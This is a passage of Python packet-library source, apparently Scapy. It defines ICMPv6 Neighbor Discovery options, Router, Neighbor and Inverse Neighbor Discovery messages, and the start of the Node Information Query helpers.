        """Split the remaining bytes after the first 4: (payload, padding)."""
        payload, padding = s[:4], s[4:]
        return payload, padding
1730
1731
1732# ICMPv6 Neighbor Discovery (RFC 2461) #
1733
# Neighbor Discovery option type -> human readable name.
icmp6ndopts = {
    1: "Source Link-Layer Address",
    2: "Target Link-Layer Address",
    3: "Prefix Information",
    4: "Redirected Header",
    5: "MTU",
    6: "NBMA Shortcut Limit Option",  # RFC2491
    7: "Advertisement Interval Option",
    8: "Home Agent Information Option",
    9: "Source Address List",
    10: "Target Address List",
    11: "CGA Option",  # RFC 3971
    12: "RSA Signature Option",  # RFC 3971
    13: "Timestamp Option",  # RFC 3971
    14: "Nonce option",  # RFC 3971
    15: "Trust Anchor Option",  # RFC 3971
    16: "Certificate Option",  # RFC 3971
    17: "IP Address Option",  # RFC 4068
    18: "New Router Prefix Information Option",  # RFC 4068
    19: "Link-layer Address Option",  # RFC 4068
    20: "Neighbor Advertisement Acknowledgement Option",
    21: "CARD Request Option",  # RFC 4065/4066/4067
    22: "CARD Reply Option",  # RFC 4065/4066/4067
    23: "MAP Option",  # RFC 4140
    24: "Route Information Option",  # RFC 4191
    25: "Recursive DNS Server Option",
    26: "IPv6 Router Advertisement Flags Option",
}
1761
# Neighbor Discovery option type -> name of the class implementing it.
# Types without an entry fall back to ICMPv6NDOptUnknown in
# _ICMPv6NDGuessPayload.guess_payload_class().
icmp6ndoptscls = {
    1: "ICMPv6NDOptSrcLLAddr",
    2: "ICMPv6NDOptDstLLAddr",
    3: "ICMPv6NDOptPrefixInfo",
    4: "ICMPv6NDOptRedirectedHdr",
    5: "ICMPv6NDOptMTU",
    6: "ICMPv6NDOptShortcutLimit",
    7: "ICMPv6NDOptAdvInterval",
    8: "ICMPv6NDOptHAInfo",
    9: "ICMPv6NDOptSrcAddrList",
    10: "ICMPv6NDOptTgtAddrList",
    # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py
    # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py
    # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py
    # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py
    # 15: Do Me,
    # 16: Do Me,
    17: "ICMPv6NDOptIPAddr",
    18: "ICMPv6NDOptNewRtrPrefix",
    19: "ICMPv6NDOptLLA",
    # 20: Do Me,
    # 21: Do Me,
    # 22: Do Me,
    23: "ICMPv6NDOptMAP",
    24: "ICMPv6NDOptRouteInfo",
    25: "ICMPv6NDOptRDNSS",
    26: "ICMPv6NDOptEFA",
    31: "ICMPv6NDOptDNSSL",
    37: "ICMPv6NDOptCaptivePortal",
    38: "ICMPv6NDOptPREF64",
}
1794
# Router preference values (RFC 4191), used by the 2-bit "prf" field.
icmp6ndraprefs = {
    0: "Medium (default)",
    1: "High",
    2: "Reserved",
    3: "Low",
}
1799
1800
class _ICMPv6NDGuessPayload:
    # Mixin: selects the class of the next ND option from its type byte.
    name = "Dummy ND class that implements guess_payload_class()"

    def guess_payload_class(self, p):
        """Look up the option class for the first byte of ``p``.

        Returns None when ``p`` holds fewer than 2 bytes, and
        ICMPv6NDOptUnknown when the type has no entry in icmp6ndoptscls.
        """
        if len(p) <= 1:
            return None
        opt_type = orb(p[0])
        return icmp6ndoptscls.get(opt_type, ICMPv6NDOptUnknown)
1807
1808
1809# Beginning of ICMPv6 Neighbor Discovery Options.
1810
class ICMPv6NDOptDataField(StrLenField):
    # Option data that is zero-padded on build so that the data plus
    # 2 extra bytes is a multiple of 8; trailing zeros can optionally be
    # stripped again on dissection.
    __slots__ = ["strip_zeros"]

    def __init__(self, name, default, strip_zeros=False, **kwargs):
        super().__init__(name, default, **kwargs)
        self.strip_zeros = strip_zeros

    def i2len(self, pkt, x):
        """Length of the machine (padded) representation."""
        padded = self.i2m(pkt, x)
        return len(padded)

    def i2m(self, pkt, x):
        """Pad with zeros until len(x) + 2 is a multiple of 8."""
        missing = -(len(x) + 2) % 8
        if missing:
            x += b"\x00" * missing
        return x

    def m2i(self, pkt, x):
        """Drop trailing zero bytes when strip_zeros is set."""
        return x.rstrip(b"\x00") if self.strip_zeros else x
1831
1832
class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
    # Fallback option: 'len' is in units of 8 bytes and counts the two
    # type/len bytes; a dissected len of 0 is treated as 1.
    name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
    fields_desc = [
        ByteField("type", 0),
        FieldLenField("len", None, length_of="data", fmt="B",
                      adjust=lambda pkt, x: (2 + x) // 8),
        ICMPv6NDOptDataField(
            "data", "", strip_zeros=False,
            length_from=lambda pkt: 8 * max(pkt.len, 1) - 2),
    ]
1841
1842# NOTE: len includes type and len field. Expressed in unit of 8 bytes
# TODO: Revisit the use of ETHER_ANY
1844
1845
class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
    name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
    fields_desc = [
        ByteField("type", 1),
        ByteField("len", 1),
        SourceMACField("lladdr"),
    ]

    def mysummary(self):
        """One-line summary: option name followed by the address."""
        summary_fmt = "%name% %lladdr%"
        return self.sprintf(summary_fmt)
1854
1855
class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
    # Same layout as the source link-layer address option, with type 2.
    name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
    type = 2
1859
1860
class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
    name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
    fields_desc = [
        ByteField("type", 3),
        ByteField("len", 4),
        ByteField("prefixlen", 64),
        BitField("L", 1, 1),
        BitField("A", 1, 1),
        BitField("R", 0, 1),
        BitField("res1", 0, 5),
        XIntField("validlifetime", 0xffffffff),
        XIntField("preferredlifetime", 0xffffffff),
        XIntField("res2", 0x00000000),
        IP6Field("prefix", "::"),
    ]

    def mysummary(self):
        """One-line summary: prefix/length and the L, A and R flags."""
        summary_fmt = ("%name% %prefix%/%prefixlen% "
                       "On-link %L% Autonomous Address %A% "
                       "Router Address %R%")
        return self.sprintf(summary_fmt)
1879
1880# TODO: We should also limit the size of included packet to something
1881# like (initiallen - 40 - 2)
1882
1883
class TruncPktLenField(PacketLenField):
    # Packet field whose built bytes are cut down to a multiple of 8.

    def i2m(self, pkt, x):
        """Serialize ``x`` and drop the trailing bytes beyond a multiple of 8."""
        built = bytes(x)
        keep = len(built) // 8 * 8
        return built[:keep]

    def i2len(self, pkt, i):
        """Length of the truncated representation."""
        truncated = self.i2m(pkt, i)
        return len(truncated)
1892
1893
class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
    # 'len' is in units of 8 bytes and includes the 8 bytes of
    # type + len + res that precede the embedded packet.
    name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
    fields_desc = [
        ByteField("type", 4),
        FieldLenField("len", None, length_of="pkt", fmt="B",
                      adjust=lambda pkt, x: (x + 8) // 8),
        MayEnd(StrFixedLenField("res", b"\x00" * 6, 6)),
        TruncPktLenField("pkt", b"", IPv6,
                         length_from=lambda pkt: 8 * pkt.len - 8),
    ]
1902
1903# See which value should be used for default MTU instead of 1280
1904
1905
class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
    # The 'mtu' field defaults to 1280.
    name = "ICMPv6 Neighbor Discovery Option - MTU"
    fields_desc = [
        ByteField("type", 5),
        ByteField("len", 1),
        XShortField("res", 0),
        IntField("mtu", 1280),
    ]

    def mysummary(self):
        """One-line summary: option name followed by the MTU."""
        summary_fmt = "%name% %mtu%"
        return self.sprintf(summary_fmt)
1915
1916
class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet):  # RFC 2491
    name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
    fields_desc = [
        ByteField("type", 6),
        ByteField("len", 1),
        ByteField("shortcutlim", 40),  # XXX
        ByteField("res1", 0),
        IntField("res2", 0),
    ]
1924
1925
class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
    name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
    fields_desc = [
        ByteField("type", 7),
        ByteField("len", 1),
        ShortField("res", 0),
        IntField("advint", 0),
    ]

    def mysummary(self):
        """One-line summary: option name and interval in milliseconds."""
        summary_fmt = "%name% %advint% milliseconds"
        return self.sprintf(summary_fmt)
1935
1936
class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
    name = "ICMPv6 Neighbor Discovery - Home Agent Information"
    fields_desc = [
        ByteField("type", 8),
        ByteField("len", 1),
        ShortField("res", 0),
        ShortField("pref", 0),
        ShortField("lifetime", 1),
    ]

    def mysummary(self):
        """One-line summary: option name, preference and lifetime."""
        summary_fmt = "%name% %pref% %lifetime% seconds"
        return self.sprintf(summary_fmt)
1947
1948# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
1949
1950# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
1951
1952
class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
    name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
    fields_desc = [
        ByteField("type", 17),
        ByteField("len", 3),
        ByteEnumField(
            "optcode", 1,
            {1: "Old Care-Of Address",
             2: "New Care-Of Address",
             3: "NAR's IP address"}),
        ByteField("plen", 64),
        IntField("res", 0),
        IP6Field("addr", "::"),
    ]
1963
1964
class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
    name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)"  # noqa: E501
    fields_desc = [
        ByteField("type", 18),
        ByteField("len", 3),
        ByteField("optcode", 0),
        ByteField("plen", 64),
        IntField("res", 0),
        IP6Field("prefix", "::"),
    ]
1973
1974
# Option-Code values of the RFC 4068 Link-Layer Address (LLA) option,
# used by the "optcode" enum field of ICMPv6NDOptLLA.
_rfc4068_lla_optcode = {
    0: "Wildcard requesting resolution for all nearby AP",
    1: "LLA for the new AP",
    2: "LLA of the MN",
    3: "LLA of the NAR",
    4: "LLA of the src of TrSolPr or PrRtAdv msg",
    5: "AP identified by LLA belongs to current iface of router",
    6: "No preifx info available for AP identified by the LLA",
    7: "No fast handovers support for AP identified by the LLA",
}
1983
1984
class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
    name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)"  # noqa: E501
    fields_desc = [
        ByteField("type", 19),
        ByteField("len", 1),
        ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
        MACField("lla", ETHER_ANY),  # We only support ethernet
    ]
1991
1992
class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet):  # RFC 4140
    name = "ICMPv6 Neighbor Discovery - MAP Option"
    fields_desc = [
        ByteField("type", 23),
        ByteField("len", 3),
        BitField("dist", 1, 4),
        BitField("pref", 15, 4),  # highest availability
        BitField("R", 1, 1),
        BitField("res", 0, 7),
        IntField("validlifetime", 0xffffffff),
        IP6Field("addr", "::"),
    ]
2003
2004
class _IP6PrefixField(IP6Field):
    """IPv6 prefix whose on-wire size depends on the packet's ``len`` field.

    The prefix occupies ``8 * (pkt.len - 1)`` bytes on the wire; the
    internal value is always a full IPv6 address.
    """
    __slots__ = ["length_from"]

    def __init__(self, name, default):
        IP6Field.__init__(self, name, default)
        # Number of prefix bytes present, derived from the option length
        self.length_from = lambda pkt: 8 * (pkt.len - 1)

    def addfield(self, pkt, s, val):
        """Append the (possibly shortened or padded) prefix bytes to s."""
        return s + self.i2m(pkt, val)

    def getfield(self, pkt, s):
        """Consume the prefix bytes from s and return (remaining, address).

        The extracted bytes are normalised to exactly 16 bytes before
        conversion: short prefixes are zero-padded and anything beyond
        16 bytes is ignored (i2m only ever appends zero padding there).
        """
        # len == 0 would give -8, which slices from the wrong end of s
        tmp_len = max(self.length_from(pkt), 0)
        p = s[:tmp_len][:16].ljust(16, b'\x00')
        return s[tmp_len:], self.m2i(pkt, p)

    def i2len(self, pkt, x):
        """Return the number of bytes i2m() produces for x."""
        return len(self.i2m(pkt, x))

    def i2m(self, pkt, x):
        """Encode x as the prefix bytes matching ``pkt.len``.

        - value and len both unset: nothing is emitted (len treated as 1)
        - len unset, value set: the full 16-byte address
        - len 0 or 1: no bytes
        - len 2 or 3: the first 8 or 16 bytes
        - larger len: the address followed by zero padding
        """
        tmp_len = pkt.len

        if x is None:
            x = "::"
            if tmp_len is None:
                tmp_len = 1
        x = inet_pton(socket.AF_INET6, x)

        if tmp_len is None:
            return x
        if tmp_len in [0, 1]:
            return b""
        if tmp_len in [2, 3]:
            return x[:8 * (tmp_len - 1)]

        return x + b'\x00' * 8 * (tmp_len - 3)
2042
2043
class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet):  # RFC 4191
    """Neighbor Discovery Route Information option (type 24, RFC 4191)."""
    name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
    fields_desc = [
        ByteField("type", 24),
        # When unset, len is derived from the encoded prefix size
        FieldLenField(
            "len", None, length_of="prefix", fmt="B",
            adjust=lambda pkt, nbytes: nbytes // 8 + 1,
        ),
        ByteField("plen", None),
        BitField("res1", 0, 3),
        BitEnumField("prf", 0, 2, icmp6ndraprefs),
        BitField("res2", 0, 3),
        IntField("rtlifetime", 0xffffffff),
        _IP6PrefixField("prefix", None),
    ]

    def mysummary(self):
        """One-line summary: name, prefix/plen and route preference."""
        summary_fmt = "%name% %prefix%/%plen% Preference %prf%"
        return self.sprintf(summary_fmt)
2058
2059
class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet):  # RFC 5006
    """Neighbor Discovery Recursive DNS Server option (type 25)."""
    name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
    fields_desc = [
        ByteField("type", 25),
        # When unset, len is 2 units per listed address plus 1
        FieldLenField(
            "len", None, count_of="dns", fmt="B",
            adjust=lambda pkt, count: 2 * count + 1,
        ),
        ShortField("res", None),
        IntField("lifetime", 0xffffffff),
        IP6ListField(
            "dns", [],
            length_from=lambda pkt: 8 * (pkt.len - 1),
        ),
    ]

    def mysummary(self):
        """One-line summary: name followed by the server addresses."""
        prefix = self.sprintf("%name% ")
        servers = ", ".join(self.dns)
        return prefix + servers
2072
2073
class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet):  # RFC 5175 (prev. 5075)
    """Neighbor Discovery Expanded Flags option (type 26).

    The 48 flag bits are exposed as a single ``res`` bit field.
    """
    name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
    fields_desc = [
        ByteField("type", 26),
        ByteField("len", 1),
        BitField("res", 0, 48),
    ]
2079
2080# As required in Sect 8. of RFC 3315, Domain Names must be encoded as
2081# described in section 3.1 of RFC 1035
2082# XXX Label should be at most 63 octets in length : we do not enforce it
2083# Total length of domain should be 255 : we do not enforce it either
2084
2085
class DomainNameListField(StrLenField):
    """List of domain names encoded as length-prefixed labels.

    The human value is a list of dotted names; the machine value is the
    concatenation of their label encodings, each name ending with a
    zero byte. With ``padded=True`` the encoding is zero-padded to a
    multiple of ``padded_unit`` bytes, and the padding zeros are not
    reported as empty names when decoding.
    """
    __slots__ = ["padded"]
    islist = 1
    padded_unit = 8

    def __init__(self, name, default, length_from=None, padded=False):  # noqa: E501
        self.padded = padded
        StrLenField.__init__(self, name, default, length_from=length_from)

    def i2len(self, pkt, x):
        """Return the encoded size of x in bytes."""
        return len(self.i2m(pkt, x))

    def i2h(self, pkt, x):
        """Return x, mapping any empty value to an empty list."""
        if not x:
            return []
        return x

    def m2i(self, pkt, x):
        """Decode wire bytes into a list of dotted names ending with '.'.

        Parsing is done on the raw bytes and every label is decoded
        separately: a label's length prefix counts bytes, so decoding
        the whole buffer to text first would mis-slice any label that
        contains non-ASCII bytes.
        """
        data = bytes_encode(x)
        res = []
        while data:
            # Get a name until \x00 is reached
            cur = []
            while data and orb(data[0]) != 0:
                tmp_len = orb(data[0])
                cur.append(plain_str(data[1:tmp_len + 1]))
                data = data[tmp_len + 1:]
            # In padded mode a bare \x00 is padding, not an empty name
            if cur or not self.padded:
                res.append(".".join(cur) + ".")
            if data and orb(data[0]) == 0:
                data = data[1:]
        return res

    def i2m(self, pkt, x):
        """Encode a list of dotted names into wire bytes."""
        def conditionalTrailingDot(z):
            # A name given with a trailing dot already ends with \x00
            if z and orb(z[-1]) == 0:
                return z
            return z + b'\x00'

        def encode_label(label):
            # Encode first: the length prefix counts bytes, not characters
            raw_label = label.encode("utf8")
            return chb(len(raw_label)) + raw_label

        # Build the encoded names
        ret_string = b"".join(
            conditionalTrailingDot(
                b"".join(encode_label(z) for z in y.split('.'))
            )
            for y in x
        )

        # In padded mode, add some \x00 bytes
        remainder = len(ret_string) % self.padded_unit
        if self.padded and remainder != 0:
            ret_string += b"\x00" * (self.padded_unit - remainder)

        return ret_string
2138
2139
class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet):  # RFC 6106
    """Neighbor Discovery DNS Search List option (type 31, RFC 6106)."""
    name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
    fields_desc = [
        ByteField("type", 31),
        # When unset, len is derived from the encoded search list size
        FieldLenField(
            "len", None, length_of="searchlist", fmt="B",
            adjust=lambda pkt, nbytes: 1 + nbytes // 8,
        ),
        ShortField("res", None),
        IntField("lifetime", 0xffffffff),
        DomainNameListField(
            "searchlist", [],
            length_from=lambda pkt: 8 * pkt.len - 8,
            padded=True,
        ),
    ]

    def mysummary(self):
        """One-line summary: name followed by the search domains."""
        prefix = self.sprintf("%name% ")
        domains = ", ".join(self.searchlist)
        return prefix + domains
2154
2155
class ICMPv6NDOptCaptivePortal(_ICMPv6NDGuessPayload, Packet):  # RFC 8910
    """Neighbor Discovery Captive-Portal option (type 37, RFC 8910)."""
    name = "ICMPv6 Neighbor Discovery Option - Captive-Portal Option"
    fields_desc = [
        ByteField("type", 37),
        # When unset, len is derived from the URI size plus the 2 header bytes
        FieldLenField(
            "len", None, length_of="URI", fmt="B",
            adjust=lambda pkt, nbytes: (2 + nbytes) // 8,
        ),
        ICMPv6NDOptDataField(
            "URI", "", strip_zeros=True,
            length_from=lambda pkt: 8 * max(pkt.len, 1) - 2,
        ),
    ]

    def mysummary(self):
        """One-line summary: name and URI."""
        summary_fmt = "%name% %URI%"
        return self.sprintf(summary_fmt)
2167
2168
class _PREF64(IP6Field):
    """IPv6 field that carries only the first 12 bytes on the wire."""

    def addfield(self, pkt, s, val):
        """Append the first 12 bytes of the encoded address to s."""
        encoded = self.i2m(pkt, val)
        return s + encoded[:12]

    def getfield(self, pkt, s):
        """Read 12 bytes and zero-fill the last 4 before decoding."""
        head, rest = s[:12], s[12:]
        return rest, self.m2i(pkt, head + b"\x00" * 4)
2175
2176
class ICMPv6NDOptPREF64(_ICMPv6NDGuessPayload, Packet):  # RFC 8781
    """Neighbor Discovery PREF64 option (type 38, RFC 8781)."""
    name = "ICMPv6 Neighbor Discovery Option - PREF64 Option"
    fields_desc = [
        ByteField("type", 38),
        ByteField("len", 2),
        BitField("scaledlifetime", 0, 13),
        # Prefix length code: index into the list of prefix lengths
        BitEnumField(
            "plc", 0, 3,
            ["/96", "/64", "/56", "/48", "/40", "/32"],
        ),
        _PREF64("prefix", "::"),
    ]

    def mysummary(self):
        """One-line summary: name and prefix followed by its length."""
        if self.plc < 6:
            plc = self.sprintf("%plc%")
        else:
            # Only six prefix length codes are named
            plc = f"[invalid PLC({self.plc})]"
        return self.sprintf("%name% %prefix%") + plc
2189
2190# End of ICMPv6 Neighbor Discovery Options.
2191
2192
class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
    """ICMPv6 Router Solicitation message (type 133)."""
    name = "ICMPv6 Neighbor Discovery - Router Solicitation"
    fields_desc = [
        ByteEnumField("type", 133, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        IntField("res", 0),
    ]
    # Defaults applied to an underlying IPv6 layer
    overload_fields = {
        IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255},
    }
2200
2201
class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
    """ICMPv6 Router Advertisement message (type 134)."""
    name = "ICMPv6 Neighbor Discovery - Router Advertisement"
    fields_desc = [
        ByteEnumField("type", 134, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        ByteField("chlim", 0),
        BitField("M", 0, 1),
        BitField("O", 0, 1),
        BitField("H", 0, 1),
        BitEnumField("prf", 1, 2, icmp6ndraprefs),  # RFC 4191
        BitField("P", 0, 1),
        BitField("res", 0, 2),
        ShortField("routerlifetime", 1800),
        IntField("reachabletime", 0),
        IntField("retranstimer", 0),
    ]
    # Defaults applied to an underlying IPv6 layer
    overload_fields = {
        IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255},
    }

    def answers(self, other):
        """A Router Advertisement answers any Router Solicitation."""
        return isinstance(other, ICMPv6ND_RS)

    def mysummary(self):
        """One-line summary of lifetime, hop limit, preference and flags."""
        summary_fmt = (
            "%name% Lifetime %routerlifetime% "
            "Hop Limit %chlim% "
            "Preference %prf% "
            "Managed %M% Other %O% Home %H%"
        )
        return self.sprintf(summary_fmt)
2226
2227
class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    """ICMPv6 Neighbor Solicitation message (type 135)."""
    name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
    fields_desc = [
        ByteEnumField("type", 135, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        IntField("res", 0),
        IP6Field("tgt", "::"),
    ]
    # Defaults applied to an underlying IPv6 layer
    overload_fields = {
        IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255},
    }

    def mysummary(self):
        """One-line summary: name and target address."""
        summary_fmt = "%name% (tgt: %tgt%)"
        return self.sprintf(summary_fmt)

    def hashret(self):
        """Hash on the target address, then on the payload."""
        target = bytes_encode(self.tgt)
        return target + self.payload.hashret()
2242
2243
class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    """ICMPv6 Neighbor Advertisement message (type 136)."""
    name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
    fields_desc = [
        ByteEnumField("type", 136, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        BitField("R", 1, 1),
        BitField("S", 0, 1),
        BitField("O", 1, 1),
        XBitField("res", 0, 29),
        IP6Field("tgt", "::"),
    ]
    # Defaults applied to an underlying IPv6 layer
    overload_fields = {
        IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255},
    }

    def mysummary(self):
        """One-line summary: name and target address."""
        summary_fmt = "%name% (tgt: %tgt%)"
        return self.sprintf(summary_fmt)

    def hashret(self):
        """Hash on the target address, then on the payload."""
        target = bytes_encode(self.tgt)
        return target + self.payload.hashret()

    def answers(self, other):
        """Answer a Neighbor Solicitation for the same target."""
        is_solicitation = isinstance(other, ICMPv6ND_NS)
        return is_solicitation and self.tgt == other.tgt
2264
2265# associated possible options : target link-layer option, Redirected header
2266
2267
class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    """ICMPv6 Redirect message (type 137) with target and destination."""
    name = "ICMPv6 Neighbor Discovery - Redirect"
    fields_desc = [
        ByteEnumField("type", 137, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XIntField("res", 0),
        IP6Field("tgt", "::"),
        IP6Field("dst", "::"),
    ]
    # Defaults applied to an underlying IPv6 layer
    overload_fields = {
        IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255},
    }
2277
2278
2279# ICMPv6 Inverse Neighbor Discovery (RFC 3122) #
2280
class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
    """Inverse Neighbor Discovery Source Address List option (type 9)."""
    name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
    fields_desc = [
        ByteField("type", 9),
        # When unset, len is 2 units per listed address plus 1
        FieldLenField(
            "len", None, count_of="addrlist", fmt="B",
            adjust=lambda pkt, count: 2 * count + 1,
        ),
        StrFixedLenField("res", b"\x00" * 6, 6),
        IP6ListField(
            "addrlist", [],
            length_from=lambda pkt: 8 * (pkt.len - 1),
        ),
    ]
2289
2290
class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
    """Inverse Neighbor Discovery Target Address List option (type 10).

    Same layout as the Source Address List option; only the name and
    the default ``type`` differ.
    """
    name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
    type = 10
2294
2295
# RFC3122
# Required options: source lladdr and target lladdr
# Other valid options: source address list, MTU
# - As stated in the document, it would be good to take the L2 address
#   requested in the required target lladdr option and use it as the
#   Ethernet destination address if no address is specified
# - That does not seem very practical if the user has to specify all
#   the options.
# Ether() must use the target lladdr as destination
class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
    """ICMPv6 Inverse Neighbor Discovery Solicitation (type 141)."""
    name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
    fields_desc = [
        ByteEnumField("type", 141, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XIntField("reserved", 0),
    ]
    # Defaults applied to an underlying IPv6 layer
    overload_fields = {
        IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255},
    }
2312
# Required options: target lladdr, target address list
# Other valid options: MTU
2315
2316
class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
    """ICMPv6 Inverse Neighbor Discovery Advertisement (type 142)."""
    name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
    fields_desc = [
        ByteEnumField("type", 142, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XIntField("reserved", 0),
    ]
    # Defaults applied to an underlying IPv6 layer
    overload_fields = {
        IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255},
    }
2324
2325
2326###############################################################################
2327# ICMPv6 Node Information Queries (RFC 4620)
2328###############################################################################
2329
2330# [ ] Add automatic destination address computation using computeNIGroupAddr
2331# in IPv6 class (Scapy6 modification when integrated) if :
2332# - it is not provided
2333# - upper layer is ICMPv6NIQueryName() with a valid value
2334# [ ] Try to be liberal in what we accept as internal values for _explicit_
2335# DNS elements provided by users. Any string should be considered
2336# valid and kept like it has been provided. At the moment, i2repr() will
2337# crash on many inputs
2338# [ ] Do the documentation
2339# [ ] Add regression tests
2340# [ ] Perform test against real machines (NOOP reply is proof of implementation). # noqa: E501
2341# [ ] Check if there are differences between different stacks. Among *BSD,
2342# with others.
2343# [ ] Deal with flags in a consistent way.
# [ ] Implement compression in names2dnsrepr() and decompression in
#     dnsrepr2names(). Should be deactivable.
2346
# Labels for the Node Information "qtype" field
icmp6_niqtypes = {
    0: "NOOP",
    2: "Node Name",
    3: "IPv6 Address",
    4: "IPv4 Address",
}
2351
2352
class _ICMPv6NIHashret:
    """Mixin that hashes a Node Information message on its nonce."""

    def hashret(self):
        nonce = self.nonce
        return bytes_encode(nonce)
2356
2357
2358class _ICMPv6NIAnswers:
2359 def answers(self, other):
2360 return self.nonce == other.nonce
2361
2362# Buggy; always returns the same value during a session
2363
2364
class NonceField(StrFixedLenField):
    """Fixed 8-byte string field used for the Node Information nonce.

    When no default is supplied, the default is replaced by the result
    of ``self.randval()``.
    """

    def __init__(self, name, default=None):
        StrFixedLenField.__init__(self, name, default, 8)
        if default is not None:
            return
        # NOTE(review): the comment above this class in the file calls
        # this buggy (same value for a whole session) - confirm.
        self.default = self.randval()
2370
2371
@conf.commands.register
def computeNIGroupAddr(name):
    """Compute the NI group Address. Can take a FQDN as input parameter

    Only the first label of the lowercased name is used. It is prefixed
    with its length, hashed with MD5, and the first four digest bytes
    become the last 32 bits of an ``ff02::2:xxxx:xxxx`` address.

    :param name: a node name or FQDN (str)
    :returns: the group address as a string
    """
    name = name.lower().split(".")[0]
    record = chr(len(name)) + name
    digest = md5(record.encode("utf8")).digest()
    # "%02x", not "%2x": the latter pads with a space instead of a zero
    # and yields an invalid address whenever a digest byte is below 0x10.
    addr = "ff02::2:%02x%02x:%02x%02x" % struct.unpack("BBBB", digest[:4])
    return addr
2381
2382
2383# Here is the deal. First, that protocol is a piece of shit. Then, we
2384# provide 4 classes for the different kinds of Requests (one for every
2385# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
2386# data field class that is made to be smart by guessing the specific
2387# type of value provided :
2388#
2389# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
2390# if not overridden by user
2391# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2,
2392# if not overridden
2393# - Name in the other cases: code is set to 0, if not overridden by user
2394#
# Internal storage is not only the value, but a pair providing
# the type and the value (0 is IPv6@, 1 is Name or string, 2 is IPv4@)
2397#
2398# Note : I merged getfield() and m2i(). m2i() should not be called
2399# directly anyway. Same remark for addfield() and i2m()
2400#
2401# -- arno
2402
2403# "The type of information present in the Data field of a query is
2404# declared by the ICMP Code, whereas the type of information in a
2405# Reply is determined by the Qtype"
2406
def names2dnsrepr(x):
    """
    Encode one DNS name or a list of DNS names in DNS wire format.

    Names are given as bytes. A single bytes value that already ends
    with a null byte is assumed to be encoded and is returned
    unmodified. Each name is written as length-prefixed labels followed
    by a null byte; single-component names get one more null byte.
    Result is the concatenation of all encoded names, as bytes.
    !!! At the moment, compression is not implemented !!!
    """
    if isinstance(x, bytes):
        if x and x[-1:] == b'\x00':  # stupid heuristic
            return x
        x = [x]

    encoded = []
    for name in x:
        # single-component gets one more
        terminator = b"\x00\x00" if name.count(b'.') == 0 else b"\x00"
